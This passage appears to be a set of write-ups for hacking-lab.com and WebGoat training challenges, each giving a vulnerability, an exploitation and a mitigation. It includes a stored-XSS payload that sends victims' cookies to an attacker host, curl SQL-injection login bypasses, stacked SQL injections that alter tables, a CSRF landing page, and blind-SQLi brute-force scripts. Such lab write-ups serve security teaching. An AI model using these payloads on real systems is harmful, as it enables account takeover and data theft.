-b "$ACOOKIE;$BCOOKIE" -k 'https://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=addcomment&comment=%3cscript%3ealert%281%29%3b%3c%2fscript%3e' | grep '' 40 | 41 | Now, when comment site (https://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=showcomments) will be visited via browser injected script will be executed. 42 | 43 | ### Exploitation 44 | 45 | To exploit this vulnerability following steps could be performed: 46 | 47 | First attacker needs to log in to add comments, to do so vulnerability discovered in A1 (sql injection in login form) could be used: 48 | 49 | [attacker] $ ACOOKIE=`curl -s -i 'http://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=showpage&page=start' -k | grep 'ACookie' | awk '{print $2}' | tr ';' ' '` 50 | 51 | [attacker] $ BCOOKIE=`curl -i -s -b "$ACOOKIE" -c 'cookies' -L 'https://glocken.hacking-lab.com/12001/inputval_case1/auth_inputval1/login' -k --data 'username=hacker11&action=login&originalURL=https%253A%252F%252Fglocken.hacking-lab.com%252F12001%252Finputval_case1%252Finputval1%252Fcontroller%253Faction%253Dprofile&send=Login' --data-urlencode "password=' or 'a'='a" | grep 'Set-Cookie' | awk '{print $2}' | tr ';' ' '` 52 | 53 | Attacker sets up landing page on machine 10.201.3.2 for cookies: 54 | 55 | [attacker] $ python -m SimpleHTTPServer 8888 56 | 57 | Then attacker adds malicious js script at comment site: 58 | 59 | [attacker] $ curl -s -b "$ACOOKIE;$BCOOKIE" -k 'https://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=addcomment&comment=%3cscript%3elocation.href%3d%22http%3a%2f%2f10.201.3.2%3a8888%2f%22%2bdocument.cookie%3c%2fscript%3e' 60 | 61 | Then, when valid user will buy & pay for cow bells and he will visit comment site (https://glocken.hacking-lab.com/12001/inputval_case1/inputval1/controller?action=showcomments) his cookies will be transmitted to the attacker's web server. Snippet from attacker's server log: 62 | 63 | 10.201.3.2 - - [04/Jan/2016 00:11:57] "GET /ACookie=12345;%20BCookie=wWqw6YkDPdzbBOdMxLBbWg== HTTP/1.1" 404 - 64 | 65 | ### Mitigation 66 | 67 | Follow https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet to prevent XSS. 68 | 69 | Set HttpOnly flag (https://www.owasp.org/index.php/HttpOnly) for cookies. 70 | ``` 71 | 72 | ### A3 - Broken Authentication and Session 73 | 74 | ``` 75 | ### Vulnerability 76 | 77 | Authentication and session management is flawed. The same AValue is used for a user as a session id before and after user has authenticated. 78 | 79 | Also storing session id in url also should be treated as a weakness because it makes mounting session fixation attacks easier. 80 | 81 | ### Exploitation 82 | 83 | Attack scenario: 84 | 85 | [1] Attacker gets session id (AValue) from vulnerable website: 86 | 87 | $ curl -s -i -k 'https://glocken.hacking-lab.com/12001/url_case3/url3/controller?action=showpage&page=navigate' | grep Location | awk '{print $2}' | awk -F "&" '{print $3}' 88 | 89 | AValue=9QKkSlzW75JS0RWvlaBgOg== 90 | 91 | [2] Via social engineering (or other mean) an attacker entices victim to authenticate via provided link (with earlier fetched session identifier): 92 | 93 | https://glocken.hacking-lab.com/12001/url_case3/url3/controller?action=profile&AValue=9QKkSlzW75JS0RWvlaBgOg== 94 | 95 | [3] After victim has logged in an attacker is able to see (and/or modify) victim's data simply by visiting this link: 96 | 97 | https://glocken.hacking-lab.com/12001/url_case3/url3/controller?action=profile&AValue=9QKkSlzW75JS0RWvlaBgOg== 98 | 99 | ### Mitigation 100 | 101 | Invalidate session ID (AValue) and generate new one after user has authenticated. 102 | 103 | Store session identifier in cookie rather than as part as url this makes mounting session fixation attacks more difficult. 104 | 105 | Additionally when designing and/or implementing custom authentication and session management mechanisms be sure to consult following OWASP materials: 106 | 107 | - ASVS 108 | - https://www.owasp.org/index.php/Top_10_2013-A2-Broken_Authentication_and_Session_Management 109 | - https://www.owasp.org/index.php/Session_Management_Cheat_Sheet 110 | - https://www.owasp.org/index.php/Session_Fixation 111 | ``` 112 | 113 | ### A4 - Insecure Direct Object References 114 | 115 | ``` 116 | ### Vulnerability 117 | 118 | Observation: 119 | 120 | After logging in as hacker10 with following request: 121 | 122 | GET https://glocken.hacking-lab.com/12001/cookie_case6/auth_cookie6/login?username=hacker10&password=compass&action=login&originalURL=https%253A%252F%252Fglocken.hacking-lab.com%252F12001%252Fcookie_case6%252Fcookie6%252Fcontroller%253Faction%253Dprofile&send=Login 123 | 124 | BCookie is set and redirect to https://glocken.hacking-lab.com/12001/cookie_case6/cookie6/controller?action=profile&pid=1 is done, which returns hacker11's profile. 125 | 126 | whereas after logging in as hacker11 using this request: 127 | 128 | GET https://glocken.hacking-lab.com/12001/cookie_case6/auth_cookie6/login?username=hacker11&password=compass&action=login&originalURL=https%253A%252F%252Fglocken.hacking-lab.com%252F12001%252Fcookie_case6%252Fcookie6%252Fcontroller%253Faction%253Dprofile&send=Login 129 | 130 | BCookie is set and redirect to https://glocken.hacking-lab.com/12001/cookie_case6/cookie6/controller?action=profile&pid=2 is done, which returns hacker11's profile. 131 | 132 | Experiment: 133 | 134 | GET https://glocken.hacking-lab.com/12001/cookie_case6/auth_cookie6/login?username=hacker11&password=compass&action=login&originalURL=https%253A%252F%252Fglocken.hacking-lab.com%252F12001%252Fcookie_case6%252Fcookie6%252Fcontroller%253Faction%253Dprofile&send=Login 135 | 136 | GET https://glocken.hacking-lab.com/12001/cookie_case6/cookie6/controller?action=profile&pid=3 137 | 138 | will return profile for hacker12. 139 | 140 | This experiment demonstrates that authorization scheme is broken because backend logic verifies only whether user is logged (valid ACookie & BCookie are sent) and then it responds with profile's data solely based on user input (pid parameter). 141 | 142 | ### Exploitation 143 | 144 | [1] Log in as user hacker10 (or hacker11) 145 | 146 | [2] Use ACookie & BCookie from [1] and navigate to https://glocken.hacking-lab.com/12001/cookie_case6/cookie6/controller?action=profile&pid=3 - hacker12's profile will be returned 147 | 148 | ### Mitigation 149 | 150 | Fix authorization scheme - do not return profile data based on pid parameter but but based on session identifiers (ACookie & BCookie). For example for valid session identifier of user hacker10 allow to view profile data only for this user. 151 | ``` 152 | 153 | ### A5 - CSRF 154 | 155 | ``` 156 | 157 | ### Vulnerability 158 | 159 | Observation: 160 | 161 | To buy a product following two requests are needed: 162 | 163 | GET http://glocken.hacking-lab.com/12001/cookie_case0/cookie0/controller?action=addproduct&productId=1&quantity=1&Submit=Order 164 | 165 | GET http://glocken.hacking-lab.com/12001/cookie_case0/cookie0/controller?action=executeOrder 166 | 167 | There is no anti CSRF mechanism in place so it is possible to mount CSRF attack on authenticated user of Glockenemil Website (cookie0) site. 168 | 169 | ### Exploitation 170 | 171 | [1] Attacker prepares following "landing page": 172 | 173 | 174 | 175 |

176 |

177 | 178 | 179 | 180 | Saves it as b.html file and then hosts in on his machine (10.201.1.66): 181 | 182 | $ python -m SimpleHTTPServer 8080 183 | 184 | [2] Attacker entices legitimate authenticated user (via social engineering, phising, drive-by infection, etc.) to vist attacker's "landing page": http://10.201.1.66:8080/b.html. This results in buying additional (unwanted) products be the legitimate user. 185 | 186 | ### Mitigation 187 | 188 | Anti CSRF mechanism for example synchronizer token pattern should be used (https://www.owasp.org/index.php/Category:OWASP_CSRFGuard_Project). 189 | ``` 190 | 191 | ### A6 - Security Misconfiguration 192 | 193 | ### A7 - Insecure Cryptographic Storage 194 | 195 | ### A8 - Failure to Restrict URL Access 196 | 197 | ``` 198 | 199 | ### Vulnerability 200 | 201 | ### Exploitation 202 | 203 | [1] Log in as hacker10 (passwd: compass) 204 | 205 | [2] Navigate to: https://glocken.hacking-lab.com/12001/xpath_case0/admin/showtransactions 206 | 207 | Here's the list of transactions: 208 | 209 | Your query matched the following results: 210 | result: 211 | transaction: 212 | id: 1 213 | cardnr: 1323-4545-6767-8989 214 | amount: 1000.0 215 | transaction: 216 | id: 2 217 | cardnr: 1323-4545-6767-8989 218 | amount: 1900.0 219 | transaction: 220 | id: 6 221 | cardnr: 2322-4545-6457-8989 222 | amount: 3600.0 223 | transaction: 224 | id: 9 225 | cardnr: 2322-4545-6755-8989 226 | amount: 400.0 227 | transaction: 228 | id: 5 229 | cardnr: 2322-4545-6767-8945 230 | amount: 800.0 231 | transaction: 232 | id: 4 233 | cardnr: 2322-4545-6767-8989 234 | amount: 4800.0 235 | transaction: 236 | id: 8 237 | cardnr: 2322-4545-6767-8989 238 | amount: 1200.0 239 | transaction: 240 | id: 10 241 | cardnr: 2322-4545-6767-8989 242 | amount: 4540.0 243 | transaction: 244 | id: 3 245 | cardnr: 2323-4545-6767-8989 246 | amount: 100.0 247 | transaction: 248 | id: 7 249 | cardnr: 2345-4555-6767-8989 250 | amount: 2540.0 251 | transaction: 252 | id: 11 253 | cardnr: 2452-4545-6767-8989 254 | amount: 370.0 255 | 256 | ### Mitigation 257 | 258 | Enforce proper access control on admin panel. 259 | ``` 260 | 261 | ### A9 - Insufficient Transport Layer Protection 262 | 263 | ``` 264 | ### Vulnerability 265 | 266 | Presence of mixed HTTPS and HTTP content in the same page, which can be used to Leak information. 267 | 268 | For example format.css is retreived using HTTP protocol: 269 | 270 | GET http://glocken.hacking-lab.com/12001/cookie_case2/cookie2/format.css 271 | 272 | so it transmits BCookie in clear text. 273 | 274 | ### Exploitation 275 | 276 | Passive attacker colud sniff for secrets (like BCookie) in traffic to http://glocken.hacking-lab.com/12001/cookie_case2/cookie2 website. 277 | 278 | Active attacker could mount MitM attacks. 279 | 280 | ### Mitigation 281 | 282 | Do not mix HTTPS and HTTP content in the same page. Use properly configured TLS for all your resources. HSTS mechanism (https://www.owasp.org/index.php/HTTP_Strict_Transport_Security) could be used to enforce this. 283 | ``` 284 | 285 | ### A10 - Unvalidated Redirects and Forwards 286 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/README.md: -------------------------------------------------------------------------------- 1 | ## Webgoat (from hacking-lab.com) 2 | 3 | All levels (1 - 18). 4 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge1.md: -------------------------------------------------------------------------------- 1 | 2 | ## Analysis of the given RBAC system: 3 | 4 | ### Roles: 5 | ``` 6 | [Public] 7 | [User] 8 | [Manager] 9 | [Admin] 10 | ``` 11 | 12 | ### Users of the system: 13 | ``` 14 | Moe 15 | Larry 16 | Curly 17 | Shemp 18 | ``` 19 | 20 | ### Resources: 21 | ``` 22 | Public Share (ps) 23 | Time Card Entry (tce) 24 | Performance Review (pr) 25 | Time Card Approval (tca) 26 | Site Manager (sm) 27 | Account Manager (am) 28 | ``` 29 | 30 | ### Role assignment looks like this: 31 | ``` 32 | Moe is assigned to: [Public] 33 | Larry is assigned to role: [User], [Manager] 34 | Curly is assigned to role: [Public], [Manager] 35 | Shemp is assigned to role: [Admin] 36 | ``` 37 | 38 | ### After reviewing allowed access for each user, we can build following role permissions matrix: 39 | 40 | ``` 41 | Public role has access to: ps 42 | User role has access to: tce, am 43 | Manager role has access to: pr, tca 44 | Admin role has access to: sm, am 45 | ``` 46 | 47 | ## Vulnerability: 48 | 49 | System policy states that: 50 | Only the [Admin] group should have access to the 'Account Manager' resource. 51 | 52 | There is an issue with [User] role. Larry which is assigned to this role is allowed to access restricted resource 'Account Manager' which is against system policy. 53 | 54 | ## Exploitation: 55 | If user will be assigned to [User] role he will be able to access restricted 'Account Manager' resource. 56 | 57 | ## Mitigation: 58 | [User] role shouldn't give access to 'Account Manager'. Role permissions matrix should be fixed. 59 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge10.md: -------------------------------------------------------------------------------- 1 | ## Vulnerability: 2 | 3 | Logging in as webgoat user without providing password is possible. It was observed that do not sending 'Password' field in the request body allows to log in. 4 | 5 | Expected request body: 6 | ``` 7 | Username=&Password=&SUBMIT=Login 8 | ``` 9 | 10 | Sent request body: 11 | ``` 12 | Username=webgoat&SUBMIT=Login 13 | ``` 14 | 15 | It seems that backend logic checks password only if it explicitly provided in the input form. 16 | 17 | ## Exploitation: 18 | 19 | I used Zed Attack Proxy to exploit this vulnerability. Sending following request grants access to webgoat account. 20 | 21 | ``` 22 | POST http://webgoat.hacking-lab.com/attack?Screen=39&menu=1000 HTTP/1.1 23 | Proxy-Connection: keep-alive 24 | Content-Length: 29 25 | Cache-Control: max-age=0 26 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 27 | Origin: http://webgoat.hacking-lab.com 28 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/39.0.2171.65 Chrome/39.0.2171.65 Safari/537.36 29 | Content-Type: application/x-www-form-urlencoded 30 | Referer: http://webgoat.hacking-lab.com/attack?Screen=39&menu=1000 31 | Accept-Language: en-US,en;q=0.8 32 | Cookie: JSESSIONID=7EF7C71D975B0B9E4C63DF97F5ED7112 33 | Host: webgoat.hacking-lab.com 34 | 35 | Username=webgoat&SUBMIT=Login 36 | ``` 37 | 38 | ## Mitigation: 39 | 40 | Fix backend logic to always check for the password. If password isn't present in the request form do not grant access. 41 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge11.md: -------------------------------------------------------------------------------- 1 | ## Vulnerability: 2 | 3 | This is classical sql injection vulnerability where user supplied input via form is used to build sql query. 4 | 5 | ## Exploitation: 6 | 7 | by submitting following input: 8 | ``` 9 | Smith' OR 1=1 -- 10 | ``` 11 | 12 | we can retrieve all DB records. 13 | 14 | ## Mitigation: 15 | 1) validate input data 16 | 2) use prepared statements/stored procedures (https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet) 17 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge12.md: -------------------------------------------------------------------------------- 1 | 2 | ## Vulnerability: 3 | 4 | This time integer data type is supplied to sql query via drop down menu. 5 | 6 | ## Exploitation: 7 | 8 | Modified request in ZAP that exploits this vulnerability: 9 | 10 | ``` 11 | POST http://webgoat.hacking-lab.com/attack?Screen=77&menu=1100 HTTP/1.1 12 | Proxy-Connection: keep-alive 13 | Content-Length: 33 14 | Cache-Control: max-age=0 15 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 16 | Origin: http://webgoat.hacking-lab.com 17 | User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/39.0.2171.65 Chrome/39.0.2171.65 Safari/537.36 18 | Content-Type: application/x-www-form-urlencoded 19 | Referer: http://webgoat.hacking-lab.com/attack?Screen=77&menu=1100 20 | Accept-Language: en-US,en;q=0.8 21 | Cookie: JSESSIONID=DD06788BDCB1B5813FA6CDC51452FF6E 22 | Cookie: $Version=0; JSESSIONID=A93334E44AE5E96915FD28AA47049A61; $Path=/ 23 | Host: webgoat.hacking-lab.com 24 | Cookie: $Version=0; JSESSIONID=A93334E44AE5E96915FD28AA47049A61; $Path=/ 25 | 26 | station=102+OR+1%3D1&SUBMIT=Go%21 27 | ``` 28 | 29 | It retrieves all DB records. 30 | 31 | ## Mitigation: 32 | 1) validate input data 33 | 34 | 2) use prepared statements/stored procedures (https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet) 35 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge13.md: -------------------------------------------------------------------------------- 1 | ## Vulnerability: 2 | 3 | sql injection 4 | 5 | ## Exploitation: 6 | 7 | Following input modifies salary for user jsmith: 8 | ``` 9 | jsmith'; UPDATE salaries SET salary=2 WHERE userid='jsmith 10 | ``` 11 | 12 | ## Mitigation: 13 | 1) validate input data 14 | 15 | 2) use prepared statements/stored procedures (https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet) 16 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge14.md: -------------------------------------------------------------------------------- 1 | ## Vulnerability: 2 | 3 | sql injection 4 | 5 | ## Exploitation: 6 | 7 | Following input adds record to calaries table: 8 | ``` 9 | jsmith'; INSERT INTO salaries (userid, salary) VALUES ('mzet', 999999) -- 10 | ``` 11 | 12 | ## Mitigation: 13 | 1) validate input data 14 | 15 | 2) use prepared statements/stored procedures (https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet) 16 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge15.md: -------------------------------------------------------------------------------- 1 | ## Vulnerability: 2 | 3 | Site is vulnerable to reflected XSS. 4 | 5 | ## Exploitation: 6 | 7 | Injecting following Javascript code: 8 | ``` 9 | 10 | ``` 11 | 12 | Changes log to: 13 | ``` 14 | "Login succeeded for username: admin" 15 | ``` 16 | 17 | ## Mitigation: 18 | 1) Validate input data. 19 | 20 | 2) Use as https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet as guideline to defend against XSS attacks. 21 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge16.md: -------------------------------------------------------------------------------- 1 | ## Vulnerability: 2 | 3 | blind sqli 4 | 5 | ## Exploitation: 6 | 7 | Here's my script that exploits (finds requested pin field: 2364 in pins table) this issue: 8 | 9 | ``` 10 | #!/usr/bin/python3 11 | 12 | # (http://docs.python-requests.org/en/latest/) 13 | from requests import post 14 | import sys 15 | 16 | proxies = { 17 | "http": "http://127.0.0.1:8081", 18 | } 19 | 20 | headers = { 21 | 'Content-Type': 'application/x-www-form-urlencoded', 22 | 'Origin': 'http://webgoat.hacking-lab.com', 23 | 'Referer': 'http://webgoat.hacking-lab.com/attack?Screen=4&menu=1100' 24 | } 25 | 26 | cookie = '' 27 | 28 | for i in range(1111,9999): 29 | print(i) 30 | payload = "101 AND (SELECT pin FROM pins WHERE cc_number=1111222233334444)="+str(i) 31 | data = {'account_number': payload, 'SUBMIT': 'Go'} 32 | if cookie == '': 33 | r = post("http://webgoat.hacking-lab.com/attack?Screen=4&menu=1100", headers=headers, proxies=proxies, data=data) 34 | cookie = dict(JSESSIONID=r.cookies['JSESSIONID']) 35 | else: 36 | r = post("http://webgoat.hacking-lab.com/attack?Screen=4&menu=1100", headers=headers, proxies=proxies, cookies=cookie, data=data) 37 | 38 | if 'Account number is valid' in r.text: 39 | print('pin: ' + str(i)) 40 | break 41 | ``` 42 | 43 | ## Mitigation: 44 | 1) validate input data 45 | 46 | 2) follow guidelines from https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet 47 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge17.md: -------------------------------------------------------------------------------- 1 | ## Vulnerability: 2 | 3 | blind sqli 4 | 5 | ## Exploitation: 6 | 7 | Here's my script that exploits (finds requested name field: "Jill" in pins table) this issue: 8 | 9 | ``` 10 | #!/usr/bin/python3 11 | 12 | # (http://docs.python-requests.org/en/latest/) 13 | from requests import post 14 | import sys 15 | 16 | proxies = { 17 | "http": "http://127.0.0.1:8081", 18 | } 19 | 20 | headers = { 21 | 'Content-Type': 'application/x-www-form-urlencoded', 22 | 'Origin': 'http://webgoat.hacking-lab.com', 23 | 'Referer': 'http://webgoat.hacking-lab.com/attack?Screen=13&menu=1100' 24 | } 25 | 26 | cookie = '' 27 | 28 | for j in range(1,10): 29 | for i in range(65,122): 30 | payload = "101 AND (SELECT ascii(substr(name,"+str(j)+","+str(j)+")) FROM pins WHERE cc_number=4321432143214321)="+str(i) 31 | 32 | data = {'account_number': payload, 'SUBMIT': 'Go'} 33 | if cookie == '': 34 | r = post("http://webgoat.hacking-lab.com/attack?Screen=13&menu=1100", headers=headers, proxies=proxies, data=data) 35 | cookie = dict(JSESSIONID=r.cookies['JSESSIONID']) 36 | else: 37 | r = post("http://webgoat.hacking-lab.com/attack?Screen=13&menu=1100", headers=headers, proxies=proxies, cookies=cookie, data=data) 38 | 39 | if 'Account number is valid' in r.text: 40 | print(chr(i)) 41 | break 42 | ``` 43 | 44 | ## Mitigation: 45 | 1) validate input data 46 | 47 | 2) follow guidelines from https://www.owasp.org/index.php/SQL_Injection_Prevention_Cheat_Sheet 48 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge18.md: -------------------------------------------------------------------------------- 1 | ## Vulnerability: 2 | 3 | While observing AuthCookie for users: 4 | 5 | ``` 6 | webgoat: 65432ubphcfx 7 | aspect: 65432udfqtb 8 | ``` 9 | 10 | We can easily see that AuthCookie is generated from usernames using following formula: 11 | 12 | 1) 65432 is fixed prefix 13 | 14 | 2) second part is Caesar cipher with right shift of 1, so 'a' becomes 'b', 'c' becomes' 'd' and so on; but reading characters from end to the beginning 15 | 16 | So for username alice AuthCookie is equal to: `65432fdjmb` 17 | 18 | ## Exploitation: 19 | 20 | I used ZAP to intercept request & change AuthCookie cookie to 65432fdjmb and I was recognized as alice by the backend. 21 | 22 | ## Mitigation: 23 | 24 | It shouldn't be possible to calculate AuthCookie for user B knowing AuthCookie cookie for A. Randomness should be incorporated in generating AuthCookie. 25 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge2.md: -------------------------------------------------------------------------------- 1 | ## Vulnerability: 2 | 3 | Access control mechanism is only implemented for `/var/lib/tomcat6/webapps/ROOT/lesson_plans/English` directory. It allows access to files from the list and denies access for all other files (from that directory). 4 | 5 | However (as showed in 'Exploitation' paragraph below) there is no real access control for parent direcotry (`lesson_plans/`) so user can access files from that direcotry. 6 | 7 | ## Exploitation: 8 | 9 | I used "Live HTTP headers" add-on for Firefox to solve this level. 10 | 11 | Here's my HTTP request that gave me access to /var/lib/tomcat6/webapps/ROOT/lesson_plans/secret.txt file: 12 | 13 | ``` 14 | Host: webgoat.hacking-lab.com 15 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 16 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 17 | Accept-Language: en-US,en;q=0.5 18 | Accept-Encoding: gzip, deflate 19 | DNT: 1 20 | Referer: http://webgoat.hacking-lab.com/attack?Screen=57&menu=200 21 | Cookie: JSESSIONID=03720BE9C23566001E524C889638B7EE 22 | Connection: keep-alive 23 | Content-Type: application/x-www-form-urlencoded 24 | Content-Length: 35 25 | 26 | File=../secret.txt&SUBMIT=View+File 27 | ``` 28 | 29 | ## Mitigation: 30 | 31 | Proper access control mechanism should be implemented for whole directory hierarchy in webserver's root directory (`webapps/ROOT`). 32 | 33 | Also it is recommended that all sensitive files(like 'secret.txt') should be out of webserver's root directory ( `webapps/ROOT`) directory or should be explicitly denied in access control mechanism. 34 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge3.md: -------------------------------------------------------------------------------- 1 | ## Vulnerability: 2 | 3 | Following line has been found in site's source: 4 | ``` 5 | 6 | ``` 7 | 8 | ## Exploitation: 9 | Use found credentials to login - you gained administrator privileges. 10 | 11 | ## Mitigation: 12 | 1) Do not leave credentials (and any other sensitive informations) in source code. 13 | 14 | 2) use stronger passwords :) - this one could be also easily brute-forced. 15 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge4.md: -------------------------------------------------------------------------------- 1 | ## Vulnerability: 2 | 3 | Price of the HDTV is sent as POST data as a hidden form field ('Price') so it is user controlled. 4 | 5 | ## Exploitation: 6 | I used 'Live HTTP headers' firefox add-on to modify price field to 0.99 and purchased product for new price :) 7 | 8 | ## Mitigation: 9 | Price value should be stored on server side. User input in POST (and of course in GET) requests can't be trusted because those can be trivially modified. 10 | 11 | In general user input can't be trusted and need to be validated on the backend before use. 12 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge5.md: -------------------------------------------------------------------------------- 1 | ## Vulnerability: 2 | 3 | There are two issues: 4 | 5 | 1) There is now input validation of data provided by the user via HTML form so malicious input can be provided. In consequence reflected XSS attack is possible. 6 | 7 | 2) Email receipt is controlled by the user and not validated on server-side so the malicious user can send email to arbitrary person using given HTML form. 8 | 9 | ## Exploitation: 10 | 11 | In 'Questions or Comments:' from send malicious javaScript code, for testing purposes: 12 | ``` 13 | 14 | ``` 15 | 16 | This will be executed by webgoat admin when reading email. 17 | 18 | To send malicious javaScript payload additionally modify 'to' field in HTML form. I've used 'Live HTTP headers' firefox add-on for this purpose, sending following request: 19 | 20 | ``` 21 | Host: webgoat.hacking-lab.com 22 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 23 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 24 | Accept-Language: en-US,en;q=0.5 25 | Accept-Encoding: gzip, deflate 26 | DNT: 1 27 | Referer: http://webgoat.hacking-lab.com/attack?Screen=47&menu=1700 28 | Cookie: JSESSIONID=3B42A5BADB7D88877255309F1E2230D1 29 | Connection: keep-alive 30 | Content-Type: application/x-www-form-urlencoded 31 | Content-Length: 109 32 | 33 | subject=Comment+for+WebGoat&to=ciec%40owasp.org&msg=%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&SUBMIT=Send%21 34 | ``` 35 | 36 | ## Mitigation: 37 | 38 | 1) Use input validation library or implement own solution for defense against XSS attacks (OWASP ESAPI can be used or OWASP XSS Prevention Cheat Sheet as guide for implementing own solution). 39 | 40 | 2) It should be possible to send email only to webgoat@owasp.org field to in HTML form is not needed or it should be validated on server-side) 41 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge6.md: -------------------------------------------------------------------------------- 1 | 2 | ## Exploitation: 3 | 4 | Here's HTTP request which violates client validation and which I've sent to the server: 5 | 6 | ``` 7 | Host: webgoat.hacking-lab.com 8 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 9 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 10 | Accept-Language: en-US,en;q=0.5 11 | Accept-Encoding: gzip, deflate 12 | DNT: 1 13 | Referer: http://webgoat.hacking-lab.com/attack?Screen=17&menu=1700 14 | Cookie: JSESSIONID=7DC802DCDB873DB1EC4E16008085AA75 15 | Connection: keep-alive 16 | Content-Type: application/x-www-form-urlencoded 17 | Content-Length: 120 18 | 19 | field1=abcD&field2=1234&field3=abc,+123+ABC&field4=seven+sto&field5=90210cos&field6=ble90210-1111&field7=ble301-604-4882 20 | ``` 21 | 22 | Request was send using Firefox Live HTTP Headers add-on or intercepting proxy like ZAP or Burp could be used. 23 | 24 | As seen in body of request, content of forms which violates client-side filter (JavaScript validate() function) was sent. 25 | 26 | ## Mitigation: 27 | 28 | Client-side validation can be used for performance reasons (to avoid requests to server) but never for security reasons because it can be trivially evaded using intercepting proxy or sending request directly without using browser with curl for example). All untrusted input data need to be validated on server side - always. 29 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge7.md: -------------------------------------------------------------------------------- 1 | 2 | ## Vulnerability: 3 | 4 | As previously, client-side validation (this time in form of HTML restrictions) is only respected by the browser so it's not security measure. One can trivially send request which sets arbitrary values for inputs in the form as shown below. 5 | 6 | ## Exploitation: 7 | 8 | I used ZAP to intercept Firefox request, I've modified request (see my request below) & resent it. 9 | 10 | ``` 11 | POST http://webgoat.hacking-lab.com/attack?Screen=51&menu=1700 HTTP/1.1 12 | User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0 13 | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 14 | Accept-Language: en-US,en;q=0.5 15 | DNT: 1 16 | Referer: http://webgoat.hacking-lab.com/attack?Screen=51&menu=1700 17 | Cookie: JSESSIONID=BE78568F44EF325354FDF39A12E0E7AC 18 | Connection: keep-alive 19 | Content-Type: application/x-www-form-urlencoded 20 | Content-Length: 108 21 | Host: webgoat.hacking-lab.com 22 | 23 | select=sdf&radio=sdfdsf&checkbox=sdfn&shortinput=sdfsdfsdf&disabledinput=sdfffff&SUBMIT=sdfsdfsdddfsdfsdfsdf 24 | ``` 25 | 26 | Mitigation: 27 | 28 | HTML restrictions are only enforced on client-side (by browser). Server-side validation is needed to make sure that only allowed input was provided. 29 | -------------------------------------------------------------------------------- /hacking-lab.com/webgoat/challenge8.md: -------------------------------------------------------------------------------- 1 | ## Vulnerability: 2 | 3 | Money transferring mechanism on this site is vulnerable to CSRF attacks. 4 | 5 | CSRF takes advantage of the inherent statelessness of the web to simulate user actions on one website (the target site) from another website (the attacking site). 6 | 7 | ## Exploitation: 8 | 9 | Actual attack would consist of 2 following steps: 10 | 11 | 1) Preparing malicious HTML/JavaScript site that performs silent money transfer & hosting it somewhere. For example: CSRF html file on attacker's server (http://attack.example.com/csrf.html): 12 | 13 | ``` 14 | 15 | 31 | 32 | 33 | 34 | 35 | ``` 36 | 37 | This site will automatically (when loaded) transfer 999 to attacker's account number (123) 38 | 39 | 40 | 2) Enticing owner of the bank account (social engineering, phising, etc.) to visit site which has reference to csrf.html (for example: `